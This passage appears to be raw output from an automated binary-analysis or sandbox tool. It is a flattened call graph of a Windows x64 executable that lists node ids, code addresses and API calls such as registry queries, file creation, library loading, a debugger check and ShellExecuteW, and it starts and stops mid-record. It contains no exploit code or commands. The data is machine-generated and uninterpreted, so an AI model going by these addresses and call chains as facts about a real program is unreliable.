94970->94920 95028 7ff7978affc8 CreateThread 94971->95028 94973 7ff79787d367 CloseHandle 94974->94922 94976 7ff797839640 4 API calls 94975->94976 94977 7ff7978382c6 94976->94977 94978 7ff797839640 4 API calls 94977->94978 94979 7ff7978382cf 94978->94979 94980 7ff797839640 4 API calls 94979->94980 94981 7ff797837f2e 94980->94981 94981->94941 94983 7ff79787d2c8 94982->94983 94986 7ff797837d0d 94982->94986 95030 7ff79783dda4 94983->95030 94985 7ff79787d2d3 94987 7ff797837d24 94986->94987 94990 7ff797837d51 94986->94990 95029 7ff797837e4c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94987->95029 94989 7ff797837d2f memcpy_s 94989->94946 94990->94985 94991 7ff797854c68 4 API calls 94990->94991 94991->94989 94992->94948 94994 7ff797839640 4 API calls 94993->94994 94995 7ff79784efa3 94994->94995 94996 7ff797839640 4 API calls 94995->94996 94997 7ff79784efac 94996->94997 94998 7ff797839640 4 API calls 94997->94998 94999 7ff79784f02e 94998->94999 94999->94960 95001 7ff79784eede 95000->95001 95002 7ff797839640 4 API calls 95001->95002 95003 7ff79784eeea 95002->95003 95004 7ff797839640 4 API calls 95003->95004 95005 7ff79784eef6 95004->95005 95006 7ff797839640 4 API calls 95005->95006 95007 7ff79784ef02 95006->95007 95008 7ff797839640 4 API calls 95007->95008 95009 7ff79784ef0e 95008->95009 95010 7ff79784ef68 RegisterWindowMessageW 95009->95010 95010->94962 95012 7ff797846db9 95011->95012 95014 7ff797846d80 95011->95014 95039 7ff797855114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95012->95039 95015 7ff79783816b 95014->95015 95040 7ff797855114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95014->95040 95021 7ff7978539a8 95015->95021 95022 7ff79789a502 95021->95022 95027 7ff7978539cc 95021->95027 95023 7ff79783ee20 18 API calls 95022->95023 95024 7ff79789a50e 95023->95024 95025 7ff79783ee20 18 API calls 95024->95025 95026 7ff79789a52d 95025->95026 95027->94968 95028->94973 95029->94989 95031 7ff79783ddc7 memcpy_s 95030->95031 95032 7ff79783dda9 95030->95032 95031->94985 95032->95031 95034 7ff79783a7c0 95032->95034 95035 7ff79783a7ed 95034->95035 95038 7ff79783a7dd memcpy_s 95034->95038 95036 7ff79787e7da 95035->95036 95037 7ff797854c68 4 API calls 95035->95037 95037->95038 95038->95031 95042 7ff797839640 4 API calls 95041->95042 95043 7ff79783778f 95042->95043 95049 7ff797836f24 95043->95049 95046 7ff79783782c 95047 7ff797831051 95046->95047 95052 7ff797837410 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95046->95052 95048 7ff797854ebc 34 API calls _onexit 95047->95048 95048->94927 95053 7ff797836f60 95049->95053 95052->95046 95054 7ff797836f52 95053->95054 95055 7ff797836f85 95053->95055 95054->95046 95055->95054 95056 7ff797836f93 RegOpenKeyExW 95055->95056 95056->95054 95057 7ff797836faf RegQueryValueExW 95056->95057 95058 7ff797836fdd 95057->95058 95059 7ff797836ff5 RegCloseKey 95057->95059 95058->95059 95059->95054 95061 7ff797839640 4 API calls 95060->95061 95062 7ff797851db2 GetVersionExW 95061->95062 95063 7ff797837cf4 4 API calls 95062->95063 95065 7ff797851dfc 95063->95065 95064 7ff79783dda4 4 API calls 95064->95065 95065->95064 95066 7ff797851e87 95065->95066 95067 7ff79783dda4 4 API calls 95066->95067 95072 7ff797851ea4 95067->95072 95068 7ff797899645 95069 7ff79789964f 95068->95069 95083 7ff7978a32f4 LoadLibraryA GetProcAddress 95069->95083 95070 7ff797851f3c GetCurrentProcess IsWow64Process 95071 7ff797851f7e memcpy_s 95070->95071 95071->95069 95074 7ff797851f86 GetSystemInfo 95071->95074 95072->95068 95072->95070 95076 7ff7978310f1 95074->95076 95075 7ff7978996b1 95077 7ff7978996b5 95075->95077 95078 7ff7978996d7 GetSystemInfo 95075->95078 95082 7ff797854ebc 34 API calls _onexit 95076->95082 95084 7ff7978a32f4 LoadLibraryA GetProcAddress 95077->95084 95080 7ff7978996bf 95078->95080 95080->95076 95081 7ff7978996f0 FreeLibrary 95080->95081 95081->95076 95082->94932 95083->95075 95084->95080 95086 7ff797837948 wcsftime 95085->95086 95087 7ff797839640 4 API calls 95086->95087 95088 7ff797837a02 95087->95088 95116 7ff797835680 95088->95116 95090 7ff797837a0c 95123 7ff797853a38 95090->95123 95093 7ff7978371f8 4 API calls 95094 7ff797837a2c 95093->95094 95129 7ff797834680 95094->95129 95096 7ff797837a3d 95097 7ff797839640 4 API calls 95096->95097 95098 7ff797837a47 95097->95098 95133 7ff79783a854 95098->95133 95101 7ff79787d05c RegQueryValueExW 95102 7ff79787d131 RegCloseKey 95101->95102 95103 7ff79787d08f 95101->95103 95105 7ff797837a83 Concurrency::wait 95102->95105 95114 7ff79787d147 wcscat Concurrency::wait 95102->95114 95104 7ff797854c68 4 API calls 95103->95104 95106 7ff79787d0b2 95104->95106 95105->94935 95107 7ff79787d0bf RegQueryValueExW 95106->95107 95108 7ff79787d0f3 95107->95108 95111 7ff79787d112 95107->95111 95109 7ff797837cf4 4 API calls 95108->95109 95109->95111 95110 7ff797839d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95110->95114 95111->95102 95112 7ff79783ec00 4 API calls 95112->95114 95113 7ff797834680 4 API calls 95113->95114 95114->95105 95114->95110 95114->95112 95114->95113 95115->94937 95137 7ff797878f90 95116->95137 95119 7ff79783ec00 4 API calls 95120 7ff7978356b4 95119->95120 95139 7ff7978356d4 95120->95139 95122 7ff7978356c1 Concurrency::wait 95122->95090 95124 7ff797878f90 wcsftime 95123->95124 95125 7ff797853a44 GetFullPathNameW 95124->95125 95126 7ff797853a74 95125->95126 95127 7ff797837cf4 4 API calls 95126->95127 95128 7ff797837a1b 95127->95128 95128->95093 95130 7ff79783469f 95129->95130 95132 7ff7978346c8 memcpy_s 95129->95132 95131 7ff797854c68 4 API calls 95130->95131 95131->95132 95132->95096 95134 7ff79783a87a 95133->95134 95135 7ff797837a51 RegOpenKeyExW 95133->95135 95136 7ff797854c68 4 API calls 95134->95136 95135->95101 95135->95105 95136->95135 95138 7ff79783568c GetModuleFileNameW 95137->95138 95138->95119 95140 7ff797878f90 wcsftime 95139->95140 95141 7ff7978356e9 GetFullPathNameW 95140->95141 95142 7ff79787c03a 95141->95142 95143 7ff797835712 95141->95143 95144 7ff79783a854 4 API calls 95142->95144 95145 7ff797837cf4 4 API calls 95143->95145 95146 7ff79783571c 95144->95146 95145->95146 95147 7ff79783dda4 4 API calls 95146->95147 95148 7ff797835785 95147->95148 95148->95122 95150 7ff797855947 GetStartupInfoW 95149->95150 95150->94844 95211 7ff79786b9bc EnterCriticalSection 95151->95211 95153 7ff7978592e4 95154 7ff79786ba10 _isindst LeaveCriticalSection 95153->95154 95155 7ff79783376e 95154->95155 95156 7ff797859334 95155->95156 95157 7ff79785933d 95156->95157 95158 7ff797833778 95156->95158 95212 7ff7978655d4 15 API calls abort 95157->95212 95162 7ff7978336e8 SystemParametersInfoW SystemParametersInfoW 95158->95162 95160 7ff797859342 95213 7ff79786b164 31 API calls _invalid_parameter_noinfo 95160->95213 95162->94877 95164 7ff7978337cd wcsftime 95163->95164 95165 7ff797839640 4 API calls 95164->95165 95166 7ff7978337dd GetCurrentDirectoryW 95165->95166 95214 7ff7978357a0 95166->95214 95168 7ff797833807 IsDebuggerPresent 95169 7ff79787b872 MessageBoxA 95168->95169 95170 7ff797833815 95168->95170 95171 7ff79787b894 95169->95171 95170->95171 95172 7ff797833839 95170->95172 95328 7ff79783e278 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95171->95328 95288 7ff797833f04 95172->95288 95176 7ff797833860 GetFullPathNameW 95177 7ff797837cf4 4 API calls 95176->95177 95178 7ff7978338a6 95177->95178 95304 7ff797833f9c 95178->95304 95179 7ff7978339e4 15 API calls 95181 7ff79787b8dc SetCurrentDirectoryW 95179->95181 95183 7ff7978338c7 95181->95183 95182 7ff7978338bf 95182->95179 95182->95183 95184 7ff7978338d0 95183->95184 95329 7ff79789d540 AllocateAndInitializeSid CheckTokenMembership FreeSid 95183->95329 95320 7ff797833b84 7 API calls 95184->95320 95187 7ff79787b8f8 95187->95184 95190 7ff79787b90c 95187->95190 95192 7ff797835680 6 API calls 95190->95192 95191 7ff7978338da 95193 7ff797836258 46 API calls 95191->95193 95197 7ff7978338ef 95191->95197 95194 7ff79787b916 95192->95194 95193->95197 95195 7ff79783ec00 4 API calls 95194->95195 95196 7ff79787b927 95195->95196 95199 7ff79787b94d 95196->95199 95200 7ff79787b930 95196->95200 95198 7ff797833913 95197->95198 95201 7ff797835d88 Shell_NotifyIconW 95197->95201 95324 7ff7978339e4 95198->95324 95206 7ff7978371f8 4 API calls 95199->95206 95203 7ff7978371f8 4 API calls 95200->95203 95201->95198 95205 7ff79787b93c 95203->95205 95208 7ff797837c24 4 API calls 95205->95208 95209 7ff79787b963 GetForegroundWindow ShellExecuteW 95206->95209 95208->95199 95210 7ff79787b99f Concurrency::wait 95209->95210 95210->95198 95212->95160 95213->95158 95215 7ff797839640 4 API calls 95214->95215 95216 7ff7978357d7 95215->95216 95330 7ff797839bbc 95216->95330 95218 7ff7978357fe 95219 7ff797835680 6 API calls 95218->95219 95220 7ff797835812 95219->95220 95221 7ff79783ec00 4 API calls 95220->95221 95222 7ff797835823 95221->95222 95344 7ff797836460 95222->95344 95225 7ff79787c05e 95404 7ff7978b2948 95225->95404 95226 7ff79783584e Concurrency::wait 95230 7ff79783e0a8 4 API calls 95226->95230 95228 7ff79787c074 95229 7ff79787c081 95228->95229 95231 7ff79783652c 63 API calls 95228->95231 95422 7ff79783652c 95229->95422 95232 7ff79783586a 95230->95232 95231->95229 95234 7ff79783ec00 4 API calls 95232->95234 95235 7ff797835888 95234->95235 95236 7ff79783eff8 46 API calls 95235->95236 95239 7ff79787c099 95235->95239 95237 7ff7978358ad Concurrency::wait 95236->95237 95238 7ff79783ec00 4 API calls 95237->95238 95240 7ff7978358d7 95238->95240 95242 7ff797835ab4 4 API calls 95239->95242 95240->95239 95241 7ff79783eff8 46 API calls 95240->95241 95243 7ff7978358fc Concurrency::wait 95241->95243 95244 7ff79787c0e1 95242->95244 95247 7ff797839640 4 API calls 95243->95247 95245 7ff797835ab4 4 API calls 95244->95245 95246 7ff79787c103 95245->95246 95250 7ff797835680 6 API calls 95246->95250 95248 7ff79783591f 95247->95248 95370 7ff797835ab4 95248->95370 95252 7ff79787c12b 95250->95252 95254 7ff797835ab4 4 API calls 95252->95254 95256 7ff79787c139 95254->95256 95255 7ff797835941 95255->95239 95257 7ff797835949 95255->95257 95258 7ff79783e0a8 4 API calls 95256->95258 95259 7ff797858e28 wcsftime 37 API calls 95257->95259 95260 7ff79787c14a 95258->95260 95261 7ff797835958 95259->95261 95262 7ff797835ab4 4 API calls 95260->95262 95261->95244 95263 7ff797835960 95261->95263 95264 7ff79787c15b 95262->95264 95265 7ff797858e28 wcsftime 37 API calls 95263->95265 95268 7ff79783e0a8 4 API calls 95264->95268 95266 7ff79783596f 95265->95266 95266->95246 95267 7ff797835977 95266->95267 95269 7ff797858e28 wcsftime 37 API calls 95267->95269 95271 7ff79787c172 95268->95271 95270 7ff797835986 95269->95270 95272 7ff7978359c6 95270->95272 95275 7ff797835ab4 4 API calls 95270->95275 95273 7ff797835ab4 4 API calls 95271->95273 95272->95264 95276 7ff7978359d3 95272->95276 95274 7ff79787c183 95273->95274 95277 7ff7978359a8 95275->95277 95393 7ff79783df90 95276->95393 95278 7ff79783e0a8 4 API calls 95277->95278 95279 7ff7978359b5 95278->95279 95281 7ff797835ab4 4 API calls 95279->95281 95281->95272 95284 7ff79783d670 18 API calls 95285 7ff797835a12 95284->95285 95285->95284 95286 7ff797835ab4 4 API calls 95285->95286 95287 7ff797835a60 Concurrency::wait 95285->95287 95286->95285 95287->95168 95289 7ff797833f29 wcsftime 95288->95289 95290 7ff79787ba2c memcpy_s 95289->95290 95291 7ff797833f4b 95289->95291 95293 7ff79787ba4d GetOpenFileNameW 95290->95293 95292 7ff7978356d4 5 API calls 95291->95292 95294 7ff797833f56 95292->95294 95295 7ff797833858 95293->95295 95296 7ff79787bab0 95293->95296 95706 7ff797833eb4 95294->95706 95295->95176 95295->95182 95299 7ff797837cf4 4 API calls 95296->95299 95301 7ff79787babc 95299->95301 95302 7ff797833f6c 95724 7ff797836394 95302->95724 95305 7ff797833fb6 wcsftime 95304->95305 95778 7ff797839734 95305->95778 95307 7ff797833fc4 95308 7ff797834050 95307->95308 95788 7ff797834d28 77 API calls 95307->95788 95308->95182 95310 7ff797833fd3 95310->95308 95789 7ff797834b0c 79 API calls Concurrency::wait 95310->95789 95312 7ff797833fe0 95312->95308 95313 7ff797833fe8 GetFullPathNameW 95312->95313 95314 7ff797837cf4 4 API calls 95313->95314 95315 7ff797834014 95314->95315 95316 7ff797837cf4 4 API calls 95315->95316 95317 7ff797834028 95316->95317 95318 7ff79787bac2 wcscat 95317->95318 95319 7ff797837cf4 4 API calls 95317->95319 95319->95308 95791 7ff797833d90 7 API calls 95320->95791 95322 7ff7978338d5 95323 7ff797833cbc CreateWindowExW CreateWindowExW ShowWindow ShowWindow 95322->95323 95325 7ff7978339ff 95324->95325 95326 7ff797833a41 Concurrency::wait 95325->95326 95792 7ff797833b20 95325->95792 95326->95326 95328->95182 95329->95187 95331 7ff797839be5 wcsftime 95330->95331 95332 7ff797837cf4 4 API calls 95331->95332 95333 7ff797839c1b 95331->95333 95332->95333 95343 7ff797839c4a Concurrency::wait 95333->95343 95428 7ff797839d84 95333->95428 95335 7ff797839d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95335->95343 95336 7ff79783ec00 4 API calls 95338 7ff797839d4a 95336->95338 95337 7ff797839d57 Concurrency::wait 95337->95218 95340 7ff797834680 4 API calls 95338->95340 95339 7ff79783ec00 4 API calls 95339->95343 95340->95337 95341 7ff797834680 4 API calls 95341->95343 95342 7ff797839d21 95342->95336 95342->95337 95343->95335 95343->95339 95343->95341 95343->95342 95431 7ff797836d64 95344->95431 95347 7ff79783649d 95349 7ff7978364ba FreeLibrary 95347->95349 95350 7ff7978364c0 95347->95350 95348 7ff797836d64 2 API calls 95348->95347 95349->95350 95435 7ff7978648e0 95350->95435 95353 7ff7978364db LoadLibraryExW 95454 7ff797836cc4 95353->95454 95354 7ff79787c8f6 95355 7ff79783652c 63 API calls 95354->95355 95357 7ff79787c8fe 95355->95357 95359 7ff797836cc4 3 API calls 95357->95359 95363 7ff79787c907 95359->95363 95361 7ff797836505 95362 7ff797836512 95361->95362 95361->95363 95364 7ff79783652c 63 API calls 95362->95364 95476 7ff7978367d8 95363->95476 95366 7ff797835846 95364->95366 95366->95225 95366->95226 95369 7ff79787c93f 95371 7ff797835ac6 95370->95371 95372 7ff797835ae4 95370->95372 95373 7ff79783e0a8 4 API calls 95371->95373 95374 7ff797837cf4 4 API calls 95372->95374 95375 7ff79783592d 95373->95375 95374->95375 95376 7ff797858e28 95375->95376 95377 7ff797858ea4 95376->95377 95378 7ff797858e3f 95376->95378 95681 7ff797858d98 35 API calls 2 library calls 95377->95681 95385 7ff797858e63 95378->95385 95679 7ff7978655d4 15 API calls abort 95378->95679 95381 7ff797858ed6 95383 7ff797858ee2 95381->95383 95390 7ff797858ef9 95381->95390 95382 7ff797858e49 95680 7ff79786b164 31 API calls _invalid_parameter_noinfo 95382->95680 95682 7ff7978655d4 15 API calls abort 95383->95682 95385->95255 95387 7ff797858e54 95387->95255 95388 7ff797858ee7 95683 7ff79786b164 31 API calls _invalid_parameter_noinfo 95388->95683 95391 7ff797858ef2 95390->95391 95392 7ff797862c80 37 API calls wcsftime 95390->95392 95391->95255 95392->95390 95394 7ff79783dfac 95393->95394 95395 7ff797854c68 4 API calls 95394->95395 95396 7ff7978359f5 95394->95396 95395->95396 95397 7ff79783d670 95396->95397 95398 7ff79783d698 95397->95398 95403 7ff79783d6a2 95398->95403 95684 7ff79783880c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95398->95684 95400 7ff79783ee20 18 API calls 95402 7ff797889d43 95400->95402 95401 7ff79783d7de 95401->95285 95403->95400 95403->95401 95405 7ff7978b29c8 95404->95405 95685 7ff7978b2b70 95405->95685 95408 7ff7978b29de 95408->95228 95409 7ff7978367d8 45 API calls 95410 7ff7978b2a03 95409->95410 95411 7ff7978367d8 45 API calls 95410->95411 95412 7ff7978b2a23 95411->95412 95413 7ff7978367d8 45 API calls 95412->95413 95414 7ff7978b2a49 95413->95414 95415 7ff7978367d8 45 API calls 95414->95415 95416 7ff7978b2a6d 95415->95416 95417 7ff7978367d8 45 API calls 95416->95417 95418 7ff7978b2ac5 95417->95418 95419 7ff7978b240c 32 API calls 95418->95419 95420 7ff7978b2ada 95419->95420 95420->95408 95690 7ff7978b1d48 89 API calls 95420->95690 95423 7ff79783653d 95422->95423 95424 7ff797836542 95422->95424 95691 7ff797864970 95423->95691 95426 7ff797836558 95424->95426 95427 7ff79783656f FreeLibrary 95424->95427 95426->95239 95427->95426 95429 7ff79783a7c0 4 API calls 95428->95429 95430 7ff797839d99 95429->95430 95430->95333 95432 7ff797836490 95431->95432 95433 7ff797836d74 LoadLibraryA 95431->95433 95432->95347 95432->95348 95433->95432 95434 7ff797836d89 GetProcAddress 95433->95434 95434->95432 95436 7ff7978647fc 95435->95436 95437 7ff79786482a 95436->95437 95440 7ff79786485c 95436->95440 95496 7ff7978655d4 15 API calls abort 95437->95496 95439 7ff79786482f 95497 7ff79786b164 31 API calls _invalid_parameter_noinfo 95439->95497 95442 7ff79786486f 95440->95442 95443 7ff797864862 95440->95443 95484 7ff79786feb4 95442->95484 95498 7ff7978655d4 15 API calls abort 95443->95498 95447 7ff797864883 95499 7ff7978655d4 15 API calls abort 95447->95499 95448 7ff797864890 95491 7ff797870304 95448->95491 95451 7ff7978648a3 95500 7ff79785df60 LeaveCriticalSection 95451->95500 95453 7ff7978364cf 95453->95353 95453->95354 95638 7ff797836d1c 95454->95638 95457 7ff797836d1c 2 API calls 95460 7ff797836cf1 95457->95460 95458 7ff797836d0f FreeLibrary 95459 7ff7978364f7 95458->95459 95461 7ff797836580 95459->95461 95460->95458 95460->95459 95462 7ff797854c68 4 API calls 95461->95462 95463 7ff7978365b5 memcpy_s 95462->95463 95464 7ff79787c9f5 95463->95464 95465 7ff797836740 CreateStreamOnHGlobal 95463->95465 95475 7ff797836602 95463->95475 95642 7ff7978b2e00 45 API calls 95464->95642 95466 7ff797836759 FindResourceExW 95465->95466 95465->95475 95466->95475 95468 7ff79787c97e LoadResource 95469 7ff79787c997 SizeofResource 95468->95469 95468->95475 95472 7ff79787c9ae LockResource 95469->95472 95469->95475 95470 7ff7978367d8 45 API calls 95470->95475 95471 7ff79787c9fd 95473 7ff7978367d8 45 API calls 95471->95473 95472->95475 95474 7ff7978366e8 95473->95474 95474->95361 95475->95468 95475->95470 95475->95471 95475->95474 95477 7ff79787ca6c 95476->95477 95478 7ff7978367f7 95476->95478 95643 7ff797864c5c 95478->95643 95481 7ff7978b240c 95662 7ff7978b2200 95481->95662 95483 7ff7978b2430 95483->95369 95501 7ff79786b9bc EnterCriticalSection 95484->95501 95486 7ff79786fecb 95487 7ff79786ff54 18 API calls 95486->95487 95488 7ff79786fed6 95487->95488 95489 7ff79786ba10 _isindst LeaveCriticalSection 95488->95489 95490 7ff797864879 95489->95490 95490->95447 95490->95448 95502 7ff797870040 95491->95502 95494 7ff79787035e 95494->95451 95496->95439 95497->95453 95498->95453 95499->95453 95507 7ff79787007d try_get_function 95502->95507 95504 7ff7978702de 95521 7ff79786b164 31 API calls _invalid_parameter_noinfo 95504->95521 95506 7ff79787021a 95506->95494 95514 7ff797877738 95506->95514 95510 7ff797870211 95507->95510 95517 7ff79785db68 37 API calls 4 library calls 95507->95517 95509 7ff797870277 95509->95510 95518 7ff79785db68 37 API calls 4 library calls 95509->95518 95510->95506 95520 7ff7978655d4 15 API calls abort 95510->95520 95512 7ff79787029a 95512->95510 95519 7ff79785db68 37 API calls 4 library calls 95512->95519 95522 7ff797876d04 95514->95522 95517->95509 95518->95512 95519->95510 95520->95504 95521->95506 95523 7ff797876d28 95522->95523 95524 7ff797876d40 95522->95524 95576 7ff7978655d4 15 API calls abort 95523->95576 95524->95523 95527 7ff797876d6d 95524->95527 95526 7ff797876d2d 95577 7ff79786b164 31 API calls _invalid_parameter_noinfo 95526->95577 95533 7ff797877348 95527->95533 95531 7ff797876d39 95531->95494 95579 7ff797877078 95533->95579 95536 7ff7978773bc 95611 7ff7978655b4 15 API calls abort 95536->95611 95537 7ff7978773d3 95599 7ff79786e418 95537->95599 95541 7ff7978773f7 CreateFileW 95543 7ff7978774eb GetFileType 95541->95543 95544 7ff797877469 95541->95544 95542 7ff7978773df 95613 7ff7978655b4 15 API calls abort 95542->95613 95548 7ff7978774f8 GetLastError 95543->95548 95555 7ff797877549 95543->95555 95547 7ff7978774b8 GetLastError 95544->95547 95550 7ff797877478 CreateFileW 95544->95550 95615 7ff797865564 15 API calls 2 library calls 95547->95615 95616 7ff797865564 15 API calls 2 library calls 95548->95616 95549 7ff7978773e4 95614 7ff7978655d4 15 API calls abort 95549->95614 95550->95543 95550->95547 95552 7ff797876d95 95552->95531 95578 7ff79786e3f4 LeaveCriticalSection 95552->95578 95618 7ff79786e334 16 API calls 2 library calls 95555->95618 95556 7ff7978773c1 95612 7ff7978655d4 15 API calls abort 95556->95612 95557 7ff797877507 CloseHandle 95557->95556 95559 7ff797877539 95557->95559 95617 7ff7978655d4 15 API calls abort 95559->95617 95560 7ff797877568 95562 7ff7978775b5 95560->95562 95619 7ff797877284 67 API calls 2 library calls 95560->95619 95567 7ff7978775ec 95562->95567 95620 7ff797876de4 67 API calls 4 library calls 95562->95620 95563 7ff79787753e 95563->95556 95566 7ff7978775e8 95566->95567 95568 7ff7978775fe 95566->95568 95621 7ff7978704b8 95567->95621 95568->95552 95570 7ff797877681 CloseHandle CreateFileW 95568->95570 95571 7ff7978776f9 95570->95571 95572 7ff7978776cb GetLastError 95570->95572 95571->95552 95636 7ff797865564 15 API calls 2 library calls 95572->95636 95574 7ff7978776d8 95637 7ff79786e548 16 API calls 2 library calls 95574->95637 95576->95526 95577->95531 95580 7ff7978770a4 95579->95580 95587 7ff7978770be 95579->95587 95581 7ff7978655d4 memcpy_s 15 API calls 95580->95581 95580->95587 95582 7ff7978770b3 95581->95582 95583 7ff79786b164 _invalid_parameter_noinfo 31 API calls 95582->95583 95583->95587 95584 7ff79787718c 95586 7ff797862554 31 API calls 95584->95586 95597 7ff7978771ec 95584->95597 95585 7ff79787713b 95585->95584 95588 7ff7978655d4 memcpy_s 15 API calls 95585->95588 95589 7ff7978771e8 95586->95589 95587->95585 95590 7ff7978655d4 memcpy_s 15 API calls 95587->95590 95591 7ff797877181 95588->95591 95592 7ff79787726b 95589->95592 95589->95597 95593 7ff797877130 95590->95593 95594 7ff79786b164 _invalid_parameter_noinfo 31 API calls 95591->95594 95596 7ff79786b184 _isindst 16 API calls 95592->95596 95595 7ff79786b164 _invalid_parameter_noinfo 31 API calls 95593->95595 95594->95584 95595->95585 95598 7ff797877280 95596->95598 95597->95536 95597->95537 95600 7ff79786b9bc _isindst EnterCriticalSection 95599->95600 95608 7ff79786e43b 95600->95608 95601 7ff79786e487 95603 7ff79786ba10 _isindst LeaveCriticalSection 95601->95603 95602 7ff79786e464 95604 7ff79786e170 16 API calls 95602->95604 95605 7ff79786e52a 95603->95605 95606 7ff79786e469 95604->95606 95605->95541 95605->95542 95606->95601 95610 7ff79786e310 wprintf EnterCriticalSection 95606->95610 95607 7ff79786e4c2 EnterCriticalSection 95607->95601 95609 7ff79786e4d1 LeaveCriticalSection 95607->95609 95608->95601 95608->95602 95608->95607 95609->95608 95610->95601 95611->95556 95612->95552 95613->95549 95614->95556 95615->95556 95616->95557 95617->95563 95618->95560 95619->95562 95620->95566 95622 7ff79786e604 31 API calls 95621->95622 95623 7ff7978704cc 95622->95623 95624 7ff7978704d2 95623->95624 95626 7ff79787050c 95623->95626 95628 7ff79786e604 31 API calls 95623->95628 95625 7ff79786e548 16 API calls 95624->95625 95627 7ff797870534 95625->95627 95626->95624 95629 7ff79786e604 31 API calls 95626->95629 95630 7ff797870560 95627->95630 95634 7ff797865564 fread_s 15 API calls 95627->95634 95631 7ff7978704ff 95628->95631 95632 7ff797870518 CloseHandle 95629->95632 95630->95552 95635 7ff79786e604 31 API calls 95631->95635 95632->95624 95633 7ff797870525 GetLastError 95632->95633 95633->95624 95634->95630 95635->95626 95636->95574 95637->95571 95639 7ff797836d2c LoadLibraryA 95638->95639 95640 7ff797836ce3 95638->95640 95639->95640 95641 7ff797836d41 GetProcAddress 95639->95641 95640->95457 95640->95460 95641->95640 95642->95471 95646 7ff797864c7c 95643->95646 95647 7ff79783680a 95646->95647 95648 7ff797864ca6 95646->95648 95647->95481 95648->95647 95649 7ff797864cd7 95648->95649 95650 7ff797864cb5 memcpy_s 95648->95650 95661 7ff79785df54 EnterCriticalSection 95649->95661 95659 7ff7978655d4 15 API calls abort 95650->95659 95655 7ff797864cca 95660 7ff79786b164 31 API calls _invalid_parameter_noinfo 95655->95660 95659->95655 95660->95647 95665 7ff7978647bc 95662->95665 95664 7ff7978b2210 95664->95483 95668 7ff797864724 95665->95668 95669 7ff797864746 95668->95669 95670 7ff797864732 95668->95670 95672 7ff797864742 95669->95672 95678 7ff79786bef8 6 API calls __vcrt_uninitialize_ptd 95669->95678 95676 7ff7978655d4 15 API calls abort 95670->95676 95672->95664 95673 7ff797864737 95677 7ff79786b164 31 API calls _invalid_parameter_noinfo 95673->95677 95676->95673 95677->95672 95678->95672 95679->95382 95680->95387 95681->95381 95682->95388 95683->95391 95684->95403 95689 7ff7978b2bae 95685->95689 95686 7ff7978b29da 95686->95408 95686->95409 95687 7ff7978367d8 45 API calls 95687->95689 95688 7ff7978b240c 32 API calls 95688->95689 95689->95686 95689->95687 95689->95688 95690->95408 95692 7ff79786498e 95691->95692 95693 7ff7978649a3 95691->95693 95704 7ff7978655d4 15 API calls abort 95692->95704 95702 7ff79786499e 95693->95702 95703 7ff79785df54 EnterCriticalSection 95693->95703 95695 7ff797864993 95705 7ff79786b164 31 API calls _invalid_parameter_noinfo 95695->95705 95698 7ff7978649b9 95699 7ff7978648ec 60 API calls 95698->95699 95700 7ff7978649c2 95699->95700 95701 7ff79785df60 fread_s LeaveCriticalSection 95700->95701 95701->95702 95702->95424 95704->95695 95705->95702 95707 7ff797878f90 wcsftime 95706->95707 95708 7ff797833ec4 GetLongPathNameW 95707->95708 95709 7ff797837cf4 4 API calls 95708->95709 95710 7ff797833eed 95709->95710 95711 7ff797834074 95710->95711 95712 7ff797839640 4 API calls 95711->95712 95713 7ff79783408e 95712->95713 95714 7ff7978356d4 5 API calls 95713->95714 95715 7ff79783409b 95714->95715 95716 7ff7978340a7 95715->95716 95717 7ff79787bada 95715->95717 95719 7ff797834680 4 API calls 95716->95719 95722 7ff79787bb0f 95717->95722 95758 7ff797851ad0 CompareStringW 95717->95758 95720 7ff7978340b5 95719->95720 95754 7ff7978340e8 95720->95754 95723 7ff7978340cb Concurrency::wait 95723->95302 95725 7ff797836460 105 API calls 95724->95725 95726 7ff7978363e5 95725->95726 95727 7ff79787c656 95726->95727 95729 7ff797836460 105 API calls 95726->95729 95728 7ff7978b2948 90 API calls 95727->95728 95730 7ff79787c66e 95728->95730 95731 7ff797836400 95729->95731 95732 7ff79787c672 95730->95732 95733 7ff79787c690 95730->95733 95731->95727 95734 7ff797836408 95731->95734 95735 7ff79783652c 63 API calls 95732->95735 95736 7ff797854c68 4 API calls 95733->95736 95737 7ff79787c67b 95734->95737 95738 7ff797836414 95734->95738 95735->95737 95753 7ff79787c6dd Concurrency::wait 95736->95753 95775 7ff7978ac5c8 77 API calls wprintf 95737->95775 95774 7ff79783e774 143 API calls Concurrency::wait 95738->95774 95741 7ff79787c68a 95741->95733 95742 7ff797836438 95742->95295 95743 7ff79787c895 95744 7ff79783652c 63 API calls 95743->95744 95752 7ff79787c8a9 95744->95752 95749 7ff79783ec00 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95749->95753 95752->95743 95777 7ff7978a76d8 77 API calls 3 library calls 95752->95777 95753->95743 95753->95749 95753->95752 95759 7ff7978a7400 95753->95759 95762 7ff7978b0210 95753->95762 95766 7ff79783b26c 95753->95766 95770 7ff797839940 95753->95770 95776 7ff7978a730c 39 API calls 95753->95776 95755 7ff797834107 95754->95755 95757 7ff797834130 memcpy_s 95754->95757 95756 7ff797854c68 4 API calls 95755->95756 95756->95757 95757->95723 95758->95717 95760 7ff797854c68 4 API calls 95759->95760 95761 7ff7978a744e memcpy_s 95760->95761 95761->95753 95763 7ff7978b022e 95762->95763 95764 7ff79783ec00 4 API calls 95763->95764 95765 7ff7978b0250 95764->95765 95765->95753 95767 7ff79783b323 95766->95767 95769 7ff79783b28f memcpy_s 95766->95769 95768 7ff797854c68 4 API calls 95767->95768 95768->95769 95769->95753 95771 7ff797839967 95770->95771 95773 7ff797839999 95770->95773 95772 7ff797854c68 4 API calls 95771->95772 95771->95773 95772->95773 95773->95753 95774->95742 95775->95741 95776->95753 95777->95752 95779 7ff797839762 95778->95779 95780 7ff79783988d 95778->95780 95779->95780 95781 7ff797854c68 4 API calls 95779->95781 95780->95307 95783 7ff797839791 95781->95783 95782 7ff797854c68 4 API calls 95787 7ff79783981c 95782->95787 95783->95782 95785 7ff797839940 4 API calls 95785->95787 95786 